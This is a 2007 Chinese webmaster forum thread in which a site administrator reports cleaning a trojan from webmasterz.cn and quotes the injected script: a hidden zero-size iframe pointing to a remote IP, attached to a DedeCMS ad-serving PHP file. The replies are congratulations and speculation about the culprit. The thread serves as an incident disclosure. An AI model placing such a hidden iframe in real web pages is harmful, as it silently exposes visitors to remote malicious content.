webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法

[复制链接]
查看: 3562   回复: 25
发表于 2007-10-30 07:38:20 | 显示全部楼层 |阅读模式
请大家再去帮我复查下,看还有没木马,另外前年的教程已经免费发布上去了,自己去下或者看。

挂马的人不是专业黑客,是搞这行的,把我的JS里加了个这个

document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
<?php
require(dirname(__FILE__)."/../include/config_base.php");
$aid = ereg_replace("[^0-9]","",$aid);
$dsql = new DedeSql(false);
$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
$dsql->Close();
if($row['timeset']==0) $adbody = $row['normbody'];
else{
$ntime = mytime();
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
else{ $adbody = $row['normbody']; }
}
$adbody = str_replace('"','\"',$adbody);
$adbody = str_replace("\r","\\r",$adbody);
$adbody = str_replace("\n","\\n",$adbody);
echo "<!--\r\n";
echo "document.write(\"{$adbody}\");\r\n";
echo "-->\r\n";
?>


自己看第一行 根据这个去找他到底想干什么吧 其实意图很明显的,一是玩计数器,二是做停放
发表于 2007-10-30 08:03:15 | 显示全部楼层
国内的停放?
回复 支持 反对

使用道具 举报

发表于 2007-10-30 08:08:24 | 显示全部楼层
嗯,不错,恭喜!
回复 支持 反对

使用道具 举报

发表于 2007-10-30 08:24:29 | 显示全部楼层
静水老大厉害.
回复 支持 反对

使用道具 举报

发表于 2007-10-30 08:32:05 | 显示全部楼层
查到就好啦:cool:
回复 支持 反对

使用道具 举报

发表于 2007-10-30 08:33:04 | 显示全部楼层
这些人没意思晒。或许是眼红,
回复 支持 反对

使用道具 举报

发表于 2007-10-30 10:24:06 | 显示全部楼层
老大还是反应很迅速的,一下就发现了,没有要我赚到2000论坛币
回复 支持 反对

使用道具 举报

发表于 2007-10-30 10:27:08 | 显示全部楼层
原帖由 ommofans 于 2007-10-30 10:24 发表 webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法
老大还是反应很迅速的,一下就发现了,没有要我赚到2000论坛币

webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法: 以后得抓紧啦
回复 支持 反对

使用道具 举报

发表于 2007-10-30 12:01:34 | 显示全部楼层
webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法
回复 支持 反对

使用道具 举报

发表于 2007-10-30 12:06:43 | 显示全部楼层
webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法: 以后你放我报告。来赚币。
回复 支持 反对

使用道具 举报

发表于 2007-10-30 14:36:27 | 显示全部楼层
怎么杀啊?我可能中了。但是杀毒 软件没报。
回复 支持 反对

使用道具 举报

发表于 2007-10-30 14:40:11 | 显示全部楼层
厉害啊
回复 支持 反对

使用道具 举报

发表于 2007-10-30 18:03:34 | 显示全部楼层
原帖由 mcc514 于 2007-10-30 14:36 发表 webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法
怎么杀啊?我可能中了。但是杀毒 软件没报。


上虚拟机.运行.监控情况,抓包分析.
回复 支持 反对

使用道具 举报

发表于 2007-10-30 18:59:18 | 显示全部楼层
不会是论坛里的人吧。
回复 支持 反对

使用道具 举报

发表于 2007-10-30 19:02:28 | 显示全部楼层
肯定是个病毒撒
回复 支持 反对

使用道具 举报

发表于 2007-10-30 19:19:31 | 显示全部楼层
原帖由 nod32 于 2007-10-30 18:59 发表 webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法
不会是论坛里的人吧。

肯定是了webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法:
回复 支持 反对

使用道具 举报

发表于 2007-10-30 19:45:14 | 显示全部楼层
看来有人想借东风webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法:
回复 支持 反对

使用道具 举报

发表于 2007-10-30 20:23:45 | 显示全部楼层
大家好好学啊,按现在的会员数7000+计算,希望哪天上论坛时能帮大家义务运行这7000+个IFRAME, 前提是只要网页还打得开!webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法:
回复 支持 反对

使用道具 举报

发表于 2007-10-30 21:31:53 | 显示全部楼层
有时放病毒,有时不放
回复 支持 反对

使用道具 举报

发表于 2007-10-31 10:31:46 | 显示全部楼层
严重软文AD...
回复 支持 反对

使用道具 举报

发表于 2007-11-3 23:03:00 | 显示全部楼层
思路 啊
不错咯
回复 支持 反对

使用道具 举报

发表于 2007-11-8 17:14:06 | 显示全部楼层
哈哈~被人搞了就得承认-至少他比你专业
回复 支持 反对

使用道具 举报

发表于 2007-11-8 23:10:54 | 显示全部楼层
网站有后门吧
我以前网站经常被放JS
回复 支持 反对

使用道具 举报

发表于 2007-12-15 09:10:40 | 显示全部楼层
老大真厉害
回复 支持 反对

使用道具 举报

发表于 2007-12-15 10:31:10 | 显示全部楼层
把放木马的人送到法院去webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法:
回复 支持 反对

使用道具 举报

发表于 2007-12-15 10:56:32 | 显示全部楼层
什么世道  到处都是木马
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则